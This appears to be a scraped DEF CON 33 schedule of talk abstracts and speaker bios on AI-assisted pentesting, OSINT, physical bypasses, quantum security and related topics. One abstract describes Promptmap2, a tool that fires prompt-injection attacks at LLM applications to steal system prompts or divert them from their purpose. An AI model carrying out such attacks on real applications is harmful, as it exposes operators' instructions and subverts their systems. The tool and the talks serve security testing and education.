La Inteligencia Artificial está dejando de ser una promesa futurista para convertirse en una herramienta tangible y poderosa en el presente de la ciberseguridad. En esta charla, presentamos un recorrido técnico y estratégico por el impacto de la IA en el mundo del pentesting, centrándonos especialmente en el proyecto PentestGPT, una de las iniciativas más innovadoras en este campo.x000D x000D PentestGPT es un modelo que busca automatizar y asistir tareas tradicionalmente realizadas por humanos durante pruebas de penetración, desde el reconocimiento y la enumeración hasta la explotación de vulnerabilidades. Su funcionamiento se basa en una combinación de capacidades de procesamiento de lenguaje natural, razonamiento contextual y un conocimiento actualizado de vectores de ataque y técnicas ofensivas. Más que una herramienta, se está convirtiendo en un copiloto para analistas de seguridad, reduciendo los tiempos de análisis, potenciando la documentación técnica y permitiendo que los profesionales puedan enfocarse en lo estratégico y no solo en lo operativo.x000D x000D A lo largo de la charla analizamos las capacidades actuales de la IA aplicada al pentesting, así como sus limitaciones, sesgos y riesgos de uso. Discutimos escenarios donde PentestGPT puede aportar verdadero valor (por ejemplo, en entornos con recursos limitados o como apoyo en red teams), y también advertimos sobre los peligros de una confianza ciega en la automatización. Asimismo, abordamos casos reales de uso, ejemplos prácticos y demostraciones que ilustran cómo interactuar con este tipo de sistemas.x000D x000D Pero esta charla no es solo sobre herramientas. Es una invitación a reflexionar sobre cómo se redefine el rol del pentester frente a estas tecnologías, cómo impacta en las metodologías tradicionales y qué desafíos éticos y técnicos se presentan al incorporar inteligencia artificial a procesos ofensivos. ¿Hasta dónde podemos delegar? ¿Qué responsabilidad tenemos como profesionales al utilizar estos sistemas?x000D x000D Presentada por 2 líderes de seguridad en Argentina, esta sesión busca abrir el debate, compartir experiencia práctica y aportar una mirada crítica sobre el presente y futuro del pentesting en la era de la IA. Una charla pensada tanto para quienes ya están explorando estas tecnologías, como para quienes recién comienzan a preguntarse qué lugar ocuparán en su día a día profesional.
Speakers:Matias Armándola,Axel LabrunaSoy Mati Armándola, analista de TI con más de 20 años de experiencia, especializado en Seguridad de la Información. Con un fondo en Ciencias de la Comunicación, considero esencial la concientización en seguridad. Como líder en Prevención de Pérdida de Datos, promuevo políticas que educan y sensibilizan a los usuarios. Además, doy clases en Coderhouse y Ekoparty, y soy orador en conferencias como Nerdearla, la Eko y Argentesting. Ah, cierto! Soy fan de Batman y coleccionista de cubos Rubik XD
SpeakerBio: Axel Labruna, DevSecOps & Cloud Head, Digital Transformation enthusiasticMy name is Axel and I'm from Argentina, where I live with my two dog childs, Thor and Poroto (I know, he should've been named Loki, long story!). Love playing with them, go for a walk and grab a coffee or have mate (argentinian drink :D ) in some park and read. Also series, films, friends, tech. Oh almost forgot! I'm an (almost yet) computer engineer who loves to code and automate, nowadays very into Digital Transformation, Cloud and DevSecOps!
- ics Calendar file
In today’s threat landscape, people are often the weakest link—and attackers are aware of it. From phishing and impersonation to executive targeting and account compromise, adversaries increasingly use open-source intelligence (OSINT) to build detailed profiles of individuals long before launching an attack.x000D x000D This session dives into the evolving art of people-focused reconnaissance, demonstrating how seemingly harmless public data can be weaponized into precise social engineering campaigns, identity spoofing, and credential pivoting.x000D x000D We’ll cover:x000D x000D Identity tracing techniques using breach data, professional directories, dark web leaks, and forgotten digital breadcrumbs_x000D_ x000D Building detailed social graphs across platforms like LinkedIn, GitHub, Twitter/X, Facebook, and academic/industry conference rosters_x000D_ x000D Tools and techniques to identify executive targets, their digital habits, exposed credentials, and behavioral patterns_x000D_ x000D Mapping corporate org structures and vendor relationships through public filings, social posts, and collaboration tools_x000D_ x000D How to uncover personal infrastructure (GitHub repos, sandbox environments, demo servers) tied to specific developers or architects_x000D_ x000D Cross-referencing usernames, email handles, avatars, and metadata to track digital identities across platforms_x000D_ x000D Using automation to generate identity maps and behavioral timelines using OSINT scripts and browser automation frameworks_x000D_ x000D You’ll also learn how attackers combine this recon with voice deepfakes, domain typosquatting, and AI-generated emails to execute convincing social engineering attacks—especially against high-value individuals.x000D x000D While this session is grounded in offensive techniques, it’s highly actionable for blue teams, threat intel analysts, and enterprise security leaders. We’ll walk through real-world case studies where simple recon led to large-scale breaches, compromised business email accounts, and insider attacks.x000D x000D Takeaways will include:x000D x000D A checklist for assessing your organization’s exposed human attack surface_x000D_ x000D Tools and workflows to replicate attacker tactics in your threat modeling and phishing simulations_x000D_ x000D Guidance on proactive identity protection and executive exposure management_x000D_ x000D Strategies to anonymize or reduce OSINT footprint without undermining productivity_x000D_ x000D In an era where people are increasingly the payload—not just the target—understanding how digital identities are discovered, mapped, and exploited is critical to building a truly defensible organization.x000D x000D
Speakers:Ankit Gupta,Shilpi MittalAnkit Gupta is a cybersecurity and cloud security leader with over 15 years of experience designing secure enterprise architectures. He currently leads security initiatives at Exeter Finance, focusing on resilient identity systems, Zero-Trust design, and post-quantum readiness in cloud-native environments. Ankit is a published thought leader and a speaker at IEEE on quantum threat modeling. His work bridges emerging threats and practical defense strategies for modern cloud ecosystems.
SpeakerBio: Shilpi Mittal
- ics Calendar file
For the culture, we will examine how the smallest actors in biology — proteins — can trigger the most significant disruptions, and what that means for biosecurity in the age of AI. We'll explore how molecular misbehavior mirrors threats in digital systems, from micropeptides that hijack cellular machinery to AI-designed proteins with dangerous dual-use potential. Drawing from my research on AI-driven protein design, I'll map how bias, instability, and unintended outcomes at the molecular level are reshaping what we need to secure — and who we need in the room. Join us for this thought-provoking session and be part of the conversation shaping the future of biosecurity.
SpeakerBio: Tia Pope., DrTia is a 4th-year PhD candidate whose research focuses on evaluating and developing AI tools for protein design, emphasizing dual-use risk and cyberbiosecurity threats. Her work spans MIT Lincoln Laboratory and Johnson & Johnson projects, bridging advanced research with real-world impact. She specializes in transformer-based models for protein engineering and function prediction and contributes to open-source efforts that democratize access to cutting-edge tools. Tia is committed to building secure, ethical, and resilient bio-AI systems at the intersection of machine learning, molecular design, and cybersecurity.
- ics Calendar file
The Physical Security Village explores the world of hardware bypasses and techniques generally outside of the realm of cyber-security and lockpicking. Come learn some of these bypasses, how to fix them, and have the opportunity to try them out for yourself.
We'll be covering the basics, like the under-the-door-tool and latch slipping attacks, as well as an in depth look at more complicated bypasses. Learn about elevator hacking, attacking alarm systems at the sensor and communication line, and cut-away and display models of common hardware to show how it works on the inside.
Looking for a challenge? Show us you can use lock bypass to escape from a pair of standard handcuffs in under 30 seconds and receive a prize!
And new this year we have safe cracking exhibits, a physical security challenge and more! Come swing by and say hi!
- ics Calendar file
In this talk you get an insight into real-world Red Team operations conducted onboard ships and against maritime companies. Drawing from first-hand experience, the presentation walks through how Red Teamers boarded cruise ships undercover as regular passengers and proceeded to gain deep access to both IT systems and critical operational areas. The talk reveals how testers were able to physically enter restricted zones such as communication rooms and engine control rooms, all while blending in with guests and crew. It will also showcase how vulnerabilities in shipboard infrastructure allowed the team to manipulate or disable key systems, including navigation and onboard communications, on both passenger and cargo vessels. Whether you’re in cybersecurity, maritime operations, or just curious about how to hack a ship, this is a talk you don’t want to miss.
SpeakerBio: John Andre Bjørkhaug, NetsecurityJohn-André Bjørkhaug has worked as a penetration tester for over 16 years. He has a degree in electrical engineering but prefer to break things instead of building things. This led him to become a hacker/penetration tester. John's main focus is penetration testing of internal infrastructure and physical security system together with social engineering and full scale Red Team tests.
- ics Calendar file
The main goal of this booth is to introduce you to Matter, the ""open-source, royalty-free smart home connectivity standard."" We have designed seven ways for you to discover and play with the Matter technology: - Home Assistant - Apple Home - Google Home -Ubuntu/Linux - macOS - Node.js - Python
Once you are familiar with the basics, solve some challenges and control the IoTrain!
SpeakerBio: Zoltan "zh4ck" Balazs, Principal Vulnerability Researcher at CUJO AIZoltan (@zh4ck) is a Principal Vulnerability Researcher at CUJO AI, a company focusing on smart home security. Previously he worked as a CTO for an AV Tester company, as an IT Security expert in the financial industry, and as a senior IT security consultant. He is also the developer of the Hardware Firewall Bypass Kernel Driver (HWFWBypass), the Encrypted Browser Exploit Delivery tool (#IRONSQUIRREL) and the Sandbox tester tool to test Malware Analysis Sandboxes, and is partially “responsible” for an IoT botnet infecting 600K devices.
I am a big fan of offsec certs, currently holding OSEP, OSED, OSCE, OSCP, and OSWP.
- ics Calendar file
The barrier to learn how to program PLC using ladder logic is not as high as most people think. There are free tools available and low cost PLC hardware or even free simulators that can be used as well as a wealth of information online. This workshop builds from the successful offering from last year (https://github.com/brienc23/Defcon31_workshop_materials) as part of the Maritime Cyber Petting Zoo. The presenter will bring a minimum of three Allen Bradley micro820 based trainers (https://www.plccable.com/allen-bradley-micro820-analog-ccw-plc-trainer-micro800-training-kit/) with three computers loaded with Rockwell Automation's Connected Components Workbench (CCW) software. In as little as one hour, participants will be coding on a real PLC and designing a program to control the inputs and outputs (switches and lights) on the trainers. The goal would be to invite more people into this important space of ICS/OT Security by demystifying how PLCs work.
SpeakerBio: Brien Croteau, USNA
- ics Calendar file
Browser extensions are an unmonitored threat surface in most enterprises. Security teams have tools for endpoints, networks, and identities, but the browser is often left out. Extensions can access sensitive data, run arbitrary scripts, and update silently. Most organizations have no idea what's installed across their fleet.x000D x000D This talk introduces ExtHuntr, an open source tool that scans for installed browser extensions, analyzes their permissions and behavior, and generates a risk score. It gives defenders visibility where they currently have none.x000D We will walk through how extensions are abused in the wild, how even well-known plugins can turn malicious, and why relying on store reputation is not enough. The talk includes:x000D x000D A live demo of ExtHuntr_x000D_ Breakdown of extension permission abuse_x000D_ Risk scoring logic_x000D_ Fleet-wide deployment strategies for enterprise use_x000D_ x000D Attackers already know what your users are running. This talk shows how you can know first.x000D
Speakers:Nishant Sharma,Shourya Pratap SinghNishant Sharma is a seasoned cybersecurity professional with deep expertise in cloud security, DevSecOps, and hands-on technical training. He is currently working as Head of Cybersecurity Research at SquareX (sqrx.com). He was in Cybersecurity education for 10+ years during which he served as VP Labs R&D at INE.com, headed R&D at Pentester Academy, developing thousands of host, networking and cloud security labs on AWS, GCP and Azure infrastructure. These labs were used by learners in 125+ countries. A frequent presenter at DEF CON, Black Hat, and OWASP events, and trainer/speaker/author to 10+ trainings, 15+ talks and 9+ open source tools.
SpeakerBio: Shourya Pratap SinghShourya Pratap Singh is responsible for building SquareX's security-focused extension and conducts research on countering web security risks. As a rising figure in cybersecurity, Shourya has presented his work on global stages including the DEFCON main stage, Recon Village, and Adversary Village, as well as at Black Hat Arsenal EU. He has also delivered several workshops at prestigious events such as the Texas Cyber Summit. Shourya earned his bachelor's degree from IIIT Bhubaneswar and holds a patent. His professional interests focus on strengthening the security of browser extensions and web applications.
- ics Calendar file
When attackers compromise a developer’s IDE, they own the code before it even reaches production.
VSCode and Visual Studio plugins have minimal security oversight, making them a prime target for attacker-controlled backdoors. In this talk, I’ll cover original research into compromising IDE components and plugins. Attendees will:
Expect a technical deep dive into real-world exploitation techniques, showcasing how attackers are leveraging overlooked security gaps in developer tooling.
SpeakerBio: Raphael SilvaRaphael Silva is a Security Researcher at Checkmarx, specializing in security research, SAST methodologies, and Supply Chain Security. Over the course of his career, he has presented at various conferences, as well as conducted a workshop at DEFCON30. In addition, he is experienced in vulnerability analysis, research, and disclosure, having reported multiple bugs to companies and open-source projects.
- ics Calendar file
Whether you're a cyber lawyer, regs geek, healthcare hacker, or just policy-curious. Come vibe with us at the official Policy @ DEF CON Mixers.
We’re bringing together the regulators, the disruptors, the dreamers, and the doers for two nights of thought-provoking mischief and unexpected alliances.
- ics Calendar file
Gather round, ye polyam and ENM, in this safe place to share in the community and support each other!
- ics Calendar file
- ics Calendar file
Quantum computers will crack RSA and ECC and weaken symmetric encryption, but when? NIST is betting it won't happen before 2035, setting that deadline for companies to migrate to post-quantum cryptography (PQC). However, recent developments make it clear that we might not have 10 years; we might have only 5! Join Konstantinos Karagiannis (KonstantHacker) as he breaks down the latest algorithmic estimates, including Oded Regev's game-changing tweak to Shor's algorithm, which promises faster factoring with fewer qubits. He also discusses IonQ and IBM's aggressive roadmaps, pushing us closer to cryptographically relevant quantum computers (CRQCs). Think 1000+ qubits by 2026 and fault-tolerant systems by 2030. And when Q-Day does arrive, will we be able to catch or prevent bad actors from running these algorithms on cloud quantum platforms? Learn what's possible when monitoring quantum circuit patterns and suspicious API calls.
SpeakerBio: Konstantinos Karagiannis, Director of Quantum Computing Services at ProtivitiForged in the InfoSec trenches of the 90s and a pioneer in the quantum computing space since 2012, Konstantinos Karagiannis (KonstantHacker) lives at the intersection of cryptography and physics. As Protiviti's Director of Quantum Computing Services, he translates the existential threat—and promise—of quantum for the world's top organizations. When he's not behind the mic on The Post-Quantum World podcast, you can find him on stage at RSA, Black Hat, and right here at DEF CON, where he reigns as a Venerable Village Elder of the Quantum Village.
- ics Calendar file
This panel brings together hunters at different stages in their careers, each with unique methods, battle scars, and successes. We’ll break down how experience shapes intuition, tooling, and approach, from building your first hypothesis to deconstructing high-signal anomalies in the cloud. That moment when something feels off in the data, to building new ways to catch what you missed in earlier iterations. From regular life on a Tuesday to facing challenges of building and leading threat hunting teams, expect real-world stories, tactical takeaways, lessons learned the hard way, and a few “you had to be there” moments.
Speakers:Alex Hurtado,Michael Rodriguez,Sai Molige,Stacey Lokey-Day,Zack FinkAlex is a practitioner turned podcaster that rallies community and speaks to top of mind and emerging trends within the space. Also collabs with SANS to write an annual state of detection engineering report!
SpeakerBio: Michael RodriguezMichael | Manager, Cyber Physical Security Solutions | Mandiant, Google Public Sector
Leads cyber physical security solutions and defensive strategy for public sector clients.
Over 15 years of experience in cybersecurity, specializing in SecOps, SOC transformation, CTI, and DFIR.
Spent three years embedded with a major U.S. city's Cyber Command, building their threat hunting program and enhancing their city-wide defenses.
Served as the lead security consultant for that city's Board of Elections.
Instructor at Mandiant Academy, training fellow blue teamers.
He is more usually known as Duckie, has been a Defcon SOC Goon for 10 years and once accidentally started a conference called Thruntcon held each year in Charm City.
SpeakerBio: Sai MoligeSai Molige (a.k.a. Cyb3rhawk) is Senior Manager of Threat Hunting at Forescout Technologies, where he leads cross-team threat hunting research and operations. His background includes security roles at Comcast and Snap Inc., and he is an active part of the broader security community through conferences and education programs. Sai is passionate about making detection engineering, threat intelligence, and hunting accessible to practitioners at all skill levels. He tries to tackle the common challenge in threat hunting: threat hunting that too often feels like random searching, and how research without structure can turn each hunt into starting from scratch. Sai’s LAYER approach attempts to gid into into the "why" behind hunting, bridging high-level concepts with practical methods to create repeatable, effective workflows.
He writes to gain clarity and speaks with curiosity. His quote "Sometimes we might think hunting is about finding the “new badness” in the environment, and frequently hear it is about “finding the needle in the haystack”. But it is more about understanding the nature of the needle, the composition of the haystack, and LAYERing where the next needle might fall."
SpeakerBio: Stacey Lokey-DayStacey Lokey-Day is currently a part of Mission Control At Wiz (aka Corporate Security). She is there to protect and defend Wizards from various threats and attacks on the ground, ensuring the team can focus on what they do best in the cloud ☁️🚀 An anime lover, an overthinker, a wizard and an absolute normie
SpeakerBio: Zack FinkZack is a Principal Threat Hunter with a passion for analyzing malware and finding evil.
- ics Calendar file
Privacy is under siege. Governments, corporations, and malicious actors are eroding our ability to communicate, transact, and exist without surveillance. Yet, society has been conditioned to believe that privacy is obsolete or reserved for those with "something to hide." This talk explores the urgency of accelerating privacy innovation, resisting the cultural shift against privacy, and leveraging our skills as developers, researchers, and activists to build tools that ensure privacy remains a choice. Through historical examples of hacktivism, cryptographic battles, and modern surveillance threats, this talk makes a call to action: we must accelerate privacy now before the window to do so closes forever.
SpeakerBio: Naomi BrockwellNaomi Brockwell is a privacy advocate, journalist, and founder of the Ludlow Institute, a research and media organization focused on digital rights and surveillance. She has been educating the public on decentralized technology and online privacy for over a decade, producing investigative reports, in-depth explainers, and practical guides on reclaiming digital autonomy.
Naomi is also the host of NBTV, one of the largest privacy advocacy channels, reaching millions across platforms. Her work has been featured by major media outlets, and she collaborates with leading think tanks to drive policy change. At DEF CON, she aims to equip attendees with the tools and knowledge to fight back against mass surveillance and accelerate privacy innovation.
- ics Calendar file
A bank employee calls your phone, addresses you by name, and mention your account details. They claim your account was hacked and a suspicious transaction needs urgent confirmation. Do you follow their instructions—or hang up? Have you ever wondered how criminals have access to all our personal information? This talk explores the alarming ecosystem of “criminal PII search panels” that thrive in the Brazilian cybercriminal landscape. These illicit tools, easily found on the surface and deep web, aggregate personal data from large-scale corporate breaches and make it readily searchable by fraudsters. With access to full names, ID numbers, banking details, and more, cybercriminals are empowered to launch convincing and devastating social engineering attacks. The session will dissect how these panels operate, their role in Brazil's rampant fraud industry, and the broader implications for digital privacy and security. Participants will leave with a clearer understanding of the threats posed and the certainty that privacy is dead.
SpeakerBio: Anchises Moraes, Cyber Threat intel Lead at APURA Cyber Intelligence SALord Anchises Moraes Brazilborn of the house Hacker, First of His Name, Born in Computer Science, Cybersecurity Work-aholic, Lead of Threat Intel Realm, founder of Security BSides São Paulo, Supreme Chancellor of Garoa Hacker Clube, He for She volunteer at WOMCY (LATAM Women in Cybersecurity), Mente Binária NGO Counselor, Security Specialist and Protector of the Cyber Space realm.
- ics Calendar file
This workshop will focus on our public and private lives, as well as things one might want to keep secret. If all of your data is public, then anyone can access everything everywhere. While access everywhere is the theme of DC 33, we will focus on shutting down access to your data. Being private can help set you free. We will go over both OSINT techniques to see what an individual’s footprint is and then also go over obfuscation techniques to lessen that footprint. Attendees of this workshop should bring their device and be ready to work on becoming more private.
SpeakerBio: Meghan "CarpeDiemT3ch" JacquotMeghan Jacquot is a Cybersecurity Engineer and focuses on offensive security, risk, and resilience. Meghan shares her research via conferences and publications. Throughout the year, she helps a variety of organizations and folks including DEF CON as a SOC GOON, Diana Initiative, and OWASP. She often reviews CFP and mentors new speakers. To relax she also spends time visiting national parks with her partner, reading, gardening, and hanging with her chinchilla. You may see her with the DC Book Club as she also leads that group. She’s happy to connect with others on social media with her handle CarpeDiemT3ch.
- ics Calendar file
Ever wondered what it’s like to make a career out of breaking things for a living? Join a panel of seasoned vulnerability researchers from academia, industry, and government as they share war stories, career paths, and the realities of life on the edge of digital defense. Whether you are curious about writing exploits, publishing research, or hunting zero-days with a badge, this is your chance to hear it all. Curious where a career in hacking can take you? Come ask the people who made it their job.
SpeakerBio: zardus, Arizona State University
- ics Calendar file
Promptmap2 is a vulnerability scanning tool that automatically tests prompt injection attacks on your custom LLM applications. It analyzes your LLM system prompts, runs them, and sends attack prompts to them. By checking the response, it can determine if the prompt injection was successful or not. It has ready-to-use rules to steal system prompts or distract the LLM application from its main purpose.
SpeakerBio: Utku SenUtku is a security researcher known for creating open-source security tools including promptmap, urlhunter, and wholeaked. He presented his various research and tools many times at DEF CON and Black Hat conferences. He was also nominated for Pwnie Awards in the Best Backdoor category in 2016.
- ics Calendar file
Across the world, ethical hackers and researchers working to improve election security often operate in legal gray zones. While the U.S. has seen high-profile efforts around voting machine testing, post-election audits, and researcher collaboration, many countries in the Global South still criminalize or discourage independent security testing even when it aims to protect democracy.In this talk, I’ll explore the legal and institutional risks faced by election security researchers in countries like Nigeria, where old cybercrime laws, state distrust, and political retaliation pose real threats. I’ll compare legal environments in the U.S. and emerging democracies, highlighting how Nigeria’s laws suppress the same practices that once exposed major flaws in U.S. voting systems. Through case studies which include a vulnerable Nigerian biometric system that researchers were barred from testing, I’ll show how these legal risks leave democracies dangerously exposed. Attendees will leave with actionable strategies to advocate for global safe harbor protections, along with technical workarounds (e.g., End-to-end encrypted disclosure channels) for researchers operating under threat. This session argues to expand the “safe harbor” concept to include not just vulnerability disclosures, but electoral research itself. I will outline how adapting U.S. safe harbor models (like those proposed in the ELECT Act) could protect researchers abroad while strengthening global election integrity by drawing parallels to California’s Top-to-Bottom Review (TTBR). By bringing a Global South perspective to the Voting Village, this talk invites participants to consider a more inclusive and international approach to securing elections.
SpeakerBio: Miracle OwolabiMiracle Owolabi is a cybersecurity professional and Offensive Security Engineer at esentry, where he works on fortifying systems through red teaming, ethical hacking, and proactive vulnerability discovery. With a deep commitment to protecting digital infrastructure and promoting responsible disclosure, his work bridges the gap between technical security practice and policy reform.
His expertise spans application security, penetration testing, and adversarial threat simulation—especially in regions where legal uncertainty discourages research. Miracle is passionate about elevating underrepresented voices in cybersecurity and advocating for the global recognition of ethical hackers.
At DEF CON 33, he presents a bold vision in “Legalizing Ethical Hacking: A Global Safe Harbor for Security Research”, proposing policy frameworks that protect researchers and encourage good-faith vulnerability reporting worldwide.
- ics Calendar file
Cloud security and compliance are no longer optional—they are essential for modern organizations operating in dynamic, multi-cloud environments. This hands-on workshop dives into Prowler, a powerful open-source tool designed to assess and improve your cloud security posture, with a special focus on AWS, Azure, GCP and Kubernetes environments.Over the course of two hours, participants will learn how to deploy and customize Prowler to perform automated compliance checks aligned with industry standards such as CIS, GDPR, HIPAA, and more. The session will also introduce practical techniques for extending Prowler’s capabilities using scripting, integrations, and basic AI-assisted analysis to prioritize risks and surface actionable insights.
Speakers:Toni de la Fuente,Pedro MartinToni de la Fuente, Prowler Open Source creator and CEO, has profoundly impacted cybersecurity. His AWS background and passion for FLOSS, cloud computing, and information security have fueled contributions like phpRADmin and Alfresco BART. An esteemed speaker at BlackHat and DEFCON, de la Fuente champions open-source solutions and cloud security advancements.
SpeakerBio: Pedro Martin
- ics Calendar file
pwn.college hackers, come claim your belt at the Belting Ceremony! We’ll honor those who have battled through challenges and conquered the benchmarks that earn true hacker cred. Whether it’s your first belt or the next step in your pwn.college journey, come get recognized for your skills in front of the DEF CON Academy crew.
- ics Calendar file
The pwn.talk podcast is going live from DEF CON 33 to share highlights of their DEF CON experience so far, and reflect on the launch of DEF CON Academy.
SpeakerBio: pwn.talk crew, pwn.college
- ics Calendar file
This talk introduces a high speed, open source CLI fuzzing and intruder tool designed for AppSec professionals. It supports multithreading, payload encoding, request file handling, custom headers, charset bruteforcing, and user-defined placeholders enabling highly customizable and efficient testing workflows. Originally inspired by feedback from OSCP practitioners, the tool is built to handle complex scenarios with speed and flexibility. Attendees will explore real world use cases, advanced fuzzing techniques, and how community driven tooling can advance offensive security practices.
Speakers:Nandan Gupta,Sagnik HaldarNandan Gupta is an Application Security Engineer with a strong passion for cybersecurity. He focuses on penetration testing, secure code reviews, and threat modeling to identify and mitigate vulnerabilities early in the development lifecycle.
SpeakerBio: Sagnik HaldarSagnik Haldar is a Security Engineer at a product based company, with a focus on application security, DevSecOps, and offensive tooling. With hands on experience in secure code reviews, security automation, and vulnerability research, he work at the intersection of development and security to protect large-scale web applications.
- ics Calendar file
- ics Calendar file
Quantum computing is no longer science fiction—it’s shipping racks. But as we rush to build quantum machines, are we repeating the same mistakes of closed, opaque architectures that made classical computing insecure in the first place?
In this talk, we’ll dissect the anatomy of a modern quantum computing stack—from cryo-control layers and QPU hardware to compilers and orchestration interfaces—and map out where today’s vulnerabilities hide and tomorrow’s attack surfaces may emerge, when large scale, quantum-interconnected fault-tolerant quantum computers will cooperate to run algorithms. We’ll look under the hood of real-world platforms, including examples like whitebox products under development, to see how modularity (or the lack of it) impacts trust, resilience, and innovation.
We’ll argue for an open, whitebox approach to quantum systems: where interoperability, transparency, and independent testing aren’t nice-to-haves—they’re mandatory for a secure quantum future. We’ll explore how the current supply chain and ecosystem influence who gets to build, audit, and break these systems—and why hackers, tinkerers, and architects alike must care.
We'll end with a call to anyone that likes open protocols, clean interfaces, and breaking things to make them better, as our invitation to Join the Quantum Stack Hack.
SpeakerBio: Davide VenturelliAfter spending my teenage making virtual friends on IRC, I stumbled across Shor’s algorithm in high school—a couple years after it dropped—and never looked back. Two PhDs later (Physics and HPC simulations), I spend my days implementing/inventing quantum algorithms in US government R&D (NASA, DOE, DOD), and my nights advising TreQ—a systems engineering startup tackling quantum computing manufacturing from the stack up.
- ics Calendar file
- ics Calendar file
Quantum sensors are redefining the limits of measurement by using quantum effects like superposition, coherence, and entanglement to detect magnetic fields, electric signals, time, and motion with unprecedented precision. In this talk, I will explore the science behind these sensors focusing on solid-state platforms like nitrogen-vacancy (NV) centers in diamond and examine how they’re being applied in biomedical imaging, navigation without GPS, RF detection, and more. With quantum-enhanced sensitivity and miniaturized form factors, these sensors are rapidly moving from the lab to the real world, offering new tools—and new vulnerabilities—for those who want to measure, map, or manipulate reality at the quantum scale.
SpeakerBio: Adonai CruzI am a theoretical and computational physicist with interest in spin-dependent phenomena in solid-state systems. I also have experience designing devices and creating computational simulations for quantum sensing applications. As a principal investigator (PI) I have written SBIR grants and managed projects involving multidisciplinary teams from both industry and academia in projects funded by NASA and DARPA.
- ics Calendar file
- ics Calendar file
This talk aims to educate the participants about security of quantum computing systems.
Why?
Today, quantum computers are deployed online without any security mechanisms. Researchers have been able to present crosstalk and other attacks without really violating any protection mechanisms, because there are none. Having learned from classical security that it takes many years to find and patch hardware-related problems, think Spectre or Rowhammer attacks that are actually still not patched, we need to study and educate people about quantum computer security now, so security mechanisms can be designed and deployed before quantum computers are widely spread.
What?
The talk will focus on crosstalk attacks, which have many similarities to Rowhammer in classical computers, at least in the way they behave conceptually. The talk, and brief demonstration, will be focusing on cloud-based quantum computers to show effects of crosstalk. This will make the audience consider implications of shared quantum computers, how and if multi-tenant computers should be deployed, and in general understand that the noisy and fundamentally analog nature of the machines opens them up to various security threats.
Whom?
The talk will be aimed at anyone interested in security. By focusing on code examples and brief demonstration, the talk will be sort of demonstration based, rather than physics or math based. Fundamentally, quantum computer is just a computer, and hackers and others interested in security should not need to worry about the physics before jumping into evaluating, testing, and eventually helping to secure these systems by understanding how they can break or be attack.
How you're going to give the talk?
The talk will be an interactive presentation. It will be based on slides, but audience can ask questions, etc., there will be small demo during the talk. Quantum computer experiments will be run live, but due to long queues, pre-recorded data will be used to analyze the results if the online demo does not finish in time. Code will be posted online for others to try at home. While I cannot guarantee it, I will work with qBraid to provide some quantum credits and perhaps participants can run the code in parallel to the demo. I hope this is an educational, interactive, mini-lecture on crosstalk attacks.
SpeakerBio: Jakub SzeferJakub Szefer is an Associate Professor in the Electrical and Computer Engineering Department at Northwestern University where he leads the Computer Architecture and Security Lab (CASLAB). His research focuses on security attacks and defenses at the computer architecture and hardware levels of computer systems. His work encompasses security of processor architectures, reconfigurable logic, post-quantum cryptographic accelerators, and most recently, quantum computers. He is the author of the “Principles of Secure Processor Architecture Design” book, published in 2018, and co-editor of the “Security of FPGA-Accelerated Cloud Computing Environments” book, published in 2023. He received his BS degree with highest-honors in Electrical and Computer Engineering from University of Illinois at Urbana-Champaign, and MA and PhD degrees in Electrical Engineering from Princeton University.
- ics Calendar file
Queercon’s mission is to raise awareness and promote acceptance of LGBTQIA+ individuals in the IT and infosec industries. We create space for queer people to meet, engage, and network through our badges, puzzle challenges, and meet-up events - all designed to help queer people find community where they are not alone. The Queercon Community Lounge is a place to find community anew, or return to familiar faces. Keep an eye on Hacker Tracker or queercon.org for our schedule of meetups and challenges!
- ics Calendar file
Come meet the largest social network of LGBTQIA+ and allied hackers at Queercon! Our mixers are designed for you to meet, network, and engage with like-minded people to a backdrop of music, dance, and refreshments.
A true tradition of Queercon, come celebrate the foundation of our community, coming together, with pride!
- ics Calendar file
- ics Calendar file
Discover how Reddit built a scalable, self-hosted code scanning platform after facing limitations and costs associated with existing SaaS Security tools. We’ll walk through our architecture that integrates with any CLI tool, supports pull request commit-level and scheduled scans, and delivers real-time alerts. Built with Golang, Redis, and Kubernetes, our solution gives us full control and flexibility. In this session you’ll find out how we architectured our solution, challenges we overcame, and strategies for maintaining security at scale - all without expensive SaaS Security platforms.
Speakers:Charan Akiri,Christopher GuerraWith over 14 years of experience in the software industry, I transitioned from software development to focus on security. I’ve uncovered critical Salesforce misconfigurations affecting major organizations, with my findings featured in SC Magazine, Ars Technica, The Register, and KrebsOnSecurity. I also contributed to the O'Reilly book 97 Things Every Application Security Professional Should Know, authoring a chapter on API security.
SpeakerBio: Christopher GuerraI'm an application security engineer at Reddit with prior experience in penetration testing of medical devices and security research of ICS/SCADA systems. Now a "purple team" convert that loves building systems to help scale security.
- ics Calendar file
Some exploits aren’t about brute force — they’re about perfect timing. In this session, you’ll dive into race conditions and Time-of-Check to Time-of-Use (TOCTOU) vulnerabilities, where a well-timed move can sidestep even the most careful validation. Learn how to detect these subtle flaws, how to weaponize them, and how attackers win by being just a few microseconds ahead. With live demonstrations and hands-on challenges, you’ll gain the reflexes needed to exploit the gap before the system catches on.
SpeakerBio: robwaz, Arizona State University
- ics Calendar file
In this game capture the flag you will be presented with real configurations of real wireless and radio technologies to attack. Practice your skill and learn new ones from Radio Frequency IDentification (RFID) through Software Defined Radio (SDR) and up to Bluetooth and WiFi. There may even be Infrared, if you have the eye for it.
RF Hackers Sanctuary is once again holding the Radio Frequency Capture the Flag (RFCTF) at DEF CON 32. RFHS runs this game to teach security concepts and to give people a safe and legal way to practice attacks against new and old wireless technologies.
We cater to both those who are new to radio communications as well as to those who have been playing for a long time. We are looking for inexperienced players on up to the SIGINT secret squirrels to play our games. The RFCTF can be played with a little knowledge, a pen tester's determination, and $0 to $$$$$ worth of special equipment. Our virtual RFCTF can be played completely remotely without needing any specialized equipment at all, just using your web browser! The key is to read the clues, determine the goal of each challenge, and have fun learning.
This game doesn't let you sit still either, as there are numerous fox hunts, testing your skill in tracking various signals. If running around the conference looking for WiFi, Bluetooth, or even a Tire Pressure Monitoring System (TPMS) device sounds like fun, we are your source of a higher step count.
There will be clues everywhere, and we will provide periodic updates via discord and twitter. Make sure you pay attention to what's happening at the RFCTF desk, #rfctf on our discord, on Twitter @rf_ctf, @rfhackers, and the interwebz, etc. If you have a question - ASK! We may or may not answer, at our discretion.
- ics Calendar file
In addition to the CTF and talks, which are elsewhere on the schedule, the RF Village is also a place to hang out and chat with like minded folks who share your interests.
- ics Calendar file
- ics Calendar file
- ics Calendar file
Can You Really Trust Your EDR? Spoiler: Attackers Don’t — They Exploit It.
